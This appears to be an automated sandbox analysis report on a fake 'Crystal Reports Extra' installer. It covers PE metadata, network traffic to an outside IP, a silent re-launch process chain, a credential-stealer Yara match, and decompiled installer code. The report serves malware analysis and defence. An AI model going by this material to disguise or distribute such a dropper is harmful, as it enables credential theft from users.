                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0xc22e40x244.idata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000xb361c0xb3800False0.344863934105data6.35605820433IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .itext0xb50000x16880x1800False0.544921875data5.97275005522IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .data0xb70000x37a40x3800False0.360979352679data5.04440056201IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .bss0xbb0000x6de80x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .idata0xc20000xf360x1000False0.3681640625data4.89870464796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .didata0xc30000x1a40x200False0.345703125data2.75636286825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .edata0xc40000x9a0x200False0.2578125data1.87222286659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .tls0xc50000x180x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .rdata0xc60000x5d0x200False0.189453125data1.38389437522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rsrc0xc70000x10e000x10e00False0.188628472222data3.71218064983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0xc76780xa68dBase IV DBT of \200.DBF, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                          RT_ICON0xc80e00x668dataEnglishUnited States
                                                          RT_ICON0xc87480x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                          RT_ICON0xc8a300x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                          RT_ICON0xc8b580x1628dBase IV DBT of \200.DBF, blocks size 0, block length 4096, next free block index 40, next free block 0, next used block 101056512EnglishUnited States
                                                          RT_ICON0xca1800xea8dataEnglishUnited States
                                                          RT_ICON0xcb0280x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                          RT_ICON0xcb8d00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                          RT_ICON0xcbe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                          RT_ICON0xcd1200x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4244635647, next used block 4294967295EnglishUnited States
                                                          RT_ICON0xd13480x25a8dataEnglishUnited States
                                                          RT_ICON0xd38f00x10a8dataEnglishUnited States
                                                          RT_ICON0xd49980x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                          RT_STRING0xd4e000x360data
                                                          RT_STRING0xd51600x260data
                                                          RT_STRING0xd53c00x45cdata
                                                          RT_STRING0xd581c0x40cdata
                                                          RT_STRING0xd5c280x2d4data
                                                          RT_STRING0xd5efc0xb8data
                                                          RT_STRING0xd5fb40x9cdata
                                                          RT_STRING0xd60500x374data
                                                          RT_STRING0xd63c40x398data
                                                          RT_STRING0xd675c0x368data
                                                          RT_STRING0xd6ac40x2a4data
                                                          RT_RCDATA0xd6d680x10data
                                                          RT_RCDATA0xd6d780x2c4data
                                                          RT_RCDATA0xd703c0x2cdata
                                                          RT_GROUP_ICON0xd70680xbcdataEnglishUnited States
                                                          RT_VERSION0xd71240x584dataEnglishUnited States
                                                          RT_MANIFEST0xd76a80x726XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                          Imports

                                                          DLLImport
                                                          kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                          comctl32.dllInitCommonControls
                                                          version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                          user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                          oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                          netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                          advapi32.dllRegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

                                                          Exports

                                                          NameOrdinalAddress
                                                          TMethodImplementationIntercept30x454060
                                                          __dbk_fcall_wrapper20x40d0a0
                                                          dbkFCallWrapperAddr10x4be63c

                                                          Version Infos

                                                          DescriptionData
                                                          LegalCopyright
                                                          FileVersion1.8.3.7
                                                          CompanyNameXiliumHQ
                                                          CommentsThis installation was built with Inno Setup.
                                                          ProductNameCrystal Reports Extra
                                                          ProductVersion1.8.3.7
                                                          FileDescriptionCrystal Reports Extra Setup
                                                          OriginalFileName
                                                          Translation0x0000 0x04b0

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 28, 2021 09:32:03.917289972 CEST4975080192.168.2.3147.135.170.166
                                                          Sep 28, 2021 09:32:06.927512884 CEST4975080192.168.2.3147.135.170.166
                                                          Sep 28, 2021 09:32:12.936220884 CEST4975080192.168.2.3147.135.170.166

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 28, 2021 09:31:43.347387075 CEST5391053192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:31:43.367719889 CEST53539108.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:08.785919905 CEST6402153192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:08.813378096 CEST53640218.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:29.751260996 CEST6078453192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:29.773773909 CEST53607848.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:30.270999908 CEST5114353192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:30.336164951 CEST53511438.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:30.596394062 CEST5600953192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:30.623931885 CEST53560098.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:30.881433964 CEST5902653192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:30.914977074 CEST53590268.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:31.243544102 CEST4957253192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:31.263808012 CEST53495728.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:31.678868055 CEST6082353192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:31.737932920 CEST53608238.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:32.226489067 CEST5213053192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:32.249679089 CEST53521308.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:32.736107111 CEST5510253192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:32.755748987 CEST53551028.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:33.424153090 CEST5623653192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:33.444708109 CEST53562368.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:34.276308060 CEST5652753192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:34.294154882 CEST53565278.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:34.813617945 CEST4955953192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:34.849782944 CEST53495598.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:35.501328945 CEST5265053192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:35.522119045 CEST53526508.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:37.255181074 CEST6329753192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:37.272469997 CEST53632978.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:41.634762049 CEST5836153192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:41.655853987 CEST53583618.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:45.977813005 CEST5361553192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:45.998599052 CEST53536158.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:32:54.818727016 CEST5072853192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:32:54.841602087 CEST53507288.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:33:09.431212902 CEST5377753192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:33:09.450710058 CEST53537778.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:33:30.291225910 CEST5710653192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:33:30.311527014 CEST53571068.8.8.8192.168.2.3
                                                          Sep 28, 2021 09:33:58.339514971 CEST6035253192.168.2.38.8.8.8
                                                          Sep 28, 2021 09:33:58.359219074 CEST53603528.8.8.8192.168.2.3

                                                          Code Manipulations

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: br4Cu3BycW.exe PID: 4352 Parent PID: 4476

                                                          General

                                                          Start time:09:31:48
                                                          Start date:28/09/2021
                                                          Path:C:\Users\user\Desktop\br4Cu3BycW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\br4Cu3BycW.exe'
                                                          Imagebase:0x400000
                                                          File size:5124457 bytes
                                                          MD5 hash:EC72A93F6279B16006F2196F330166EE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: br4Cu3BycW.tmp PID: 5816 Parent PID: 4352

                                                          General

                                                          Start time:09:31:50
                                                          Start date:28/09/2021
                                                          Path:C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp' /SL5='$302CC,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe'
                                                          Imagebase:0x400000
                                                          File size:3194368 bytes
                                                          MD5 hash:EEB69F7B86959AE72B9D37443FB7F3D0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: br4Cu3BycW.exe PID: 5092 Parent PID: 5816

                                                          General

                                                          Start time:09:31:51
                                                          Start date:28/09/2021
                                                          Path:C:\Users\user\Desktop\br4Cu3BycW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT
                                                          Imagebase:0x400000
                                                          File size:5124457 bytes
                                                          MD5 hash:EC72A93F6279B16006F2196F330166EE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: br4Cu3BycW.tmp PID: 5636 Parent PID: 5092

                                                          General

                                                          Start time:09:31:53
                                                          Start date:28/09/2021
                                                          Path:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp' /SL5='$120262,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT
                                                          Imagebase:0x400000
                                                          File size:3194368 bytes
                                                          MD5 hash:EEB69F7B86959AE72B9D37443FB7F3D0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: CrystalReports.exe PID: 6532 Parent PID: 5636

                                                          General

                                                          Start time:09:31:58
                                                          Start date:28/09/2021
                                                          Path:C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe'
                                                          Imagebase:0x400000
                                                          File size:4910592 bytes
                                                          MD5 hash:11DD538F1BF5F174834DBA334964A691
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.562826054.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Chronological Activities

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >

                                                            Analysis Process: br4Cu3BycW.exe PID: 4352 Parent PID: 4476 br4Cu3BycW.exeCOMMON

                                                            Executed Functions

                                                            Function 004B5114, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}





























                                                            0x004b5115
                                                            0x004b5117
                                                            0x004b511c
                                                            0x004b511c
                                                            0x004b511e
                                                            0x004b5120
                                                            0x004b5120
                                                            0x004b5128
                                                            0x004b5129
                                                            0x004b512e
                                                            0x004b5131
                                                            0x004b5134
                                                            0x004b513b
                                                            0x004b536d
                                                            0x004b536f
                                                            0x004b5372
                                                            0x004b5375
                                                            0x004b5387
                                                            0x004b5141
                                                            0x004b514b
                                                            0x004b514d
                                                            0x004b5154
                                                            0x004b515a
                                                            0x004b5167
                                                            0x004b516b
                                                            0x004b5172
                                                            0x004b5177
                                                            0x004b5179
                                                            0x004b5179
                                                            0x004b516b
                                                            0x004b517c
                                                            0x004b5188
                                                            0x004b518f
                                                            0x004b5196
                                                            0x004b5196
                                                            0x004b519b
                                                            0x004b51a8
                                                            0x004b51b4
                                                            0x004b51ba
                                                            0x004b51c1
                                                            0x004b51c6
                                                            0x004b51c6
                                                            0x004b51d4
                                                            0x004b51e0
                                                            0x004b51e0
                                                            0x004b51f3
                                                            0x004b51fb
                                                            0x004b520e
                                                            0x004b5216
                                                            0x004b5229
                                                            0x004b5231
                                                            0x004b5244
                                                            0x004b524c
                                                            0x004b525f
                                                            0x004b5267
                                                            0x004b527a
                                                            0x004b5282
                                                            0x004b5295
                                                            0x004b529d
                                                            0x004b52b0
                                                            0x004b52b8
                                                            0x004b52cb
                                                            0x004b52d3
                                                            0x004b52e6
                                                            0x004b52ee
                                                            0x004b5301
                                                            0x004b5309
                                                            0x004b531c
                                                            0x004b5324
                                                            0x004b5337
                                                            0x004b533f
                                                            0x004b533f
                                                            0x004b51b4
                                                            0x004b534a
                                                            0x004b5351
                                                            0x004b5358
                                                            0x004b5358
                                                            0x004b5360
                                                            0x004b5367
                                                            0x004b536b
                                                            0x004b536b
                                                            0x00000000
                                                            0x004b5367

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                            • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                              • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                              • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                            • API String ID: 2248137261-3182217745
                                                            • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                            • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                            • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                            • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF91C, Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}













                                                            0x004af920
                                                            0x004af923
                                                            0x004af926
                                                            0x004af92f
                                                            0x004af93b
                                                            0x004af942
                                                            0x004af9ee
                                                            0x004af9ee
                                                            0x004af948
                                                            0x004af9db
                                                            0x004af9db
                                                            0x004af9e1
                                                            0x00000000
                                                            0x00000000
                                                            0x004af954
                                                            0x004af9c7
                                                            0x004af9d2
                                                            0x004af9d9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004af95c
                                                            0x004af95c
                                                            0x004af961
                                                            0x004af967
                                                            0x004af986
                                                            0x004af98d
                                                            0x004af98f
                                                            0x004af98f
                                                            0x004af98d
                                                            0x004af994
                                                            0x004af9a5
                                                            0x004af99c
                                                            0x004af9a1
                                                            0x004af9a1
                                                            0x004af9af
                                                            0x004af9c2
                                                            0x004af9c2
                                                            0x00000000
                                                            0x004af9af
                                                            0x004af954
                                                            0x00000000
                                                            0x004af9db

                                                            APIs
                                                            • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                            • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                            • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                            • String ID:
                                                            • API String ID: 2441996862-0
                                                            • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                            • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                            • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                            • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040B044, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}













                                                            0x0040b04a
                                                            0x0040b04d
                                                            0x0040b050
                                                            0x0040b053
                                                            0x0040b055
                                                            0x0040b05b
                                                            0x0040b062
                                                            0x0040b063
                                                            0x0040b068
                                                            0x0040b06b
                                                            0x0040b070
                                                            0x0040b076
                                                            0x0040b07f
                                                            0x0040b08f
                                                            0x0040b09c
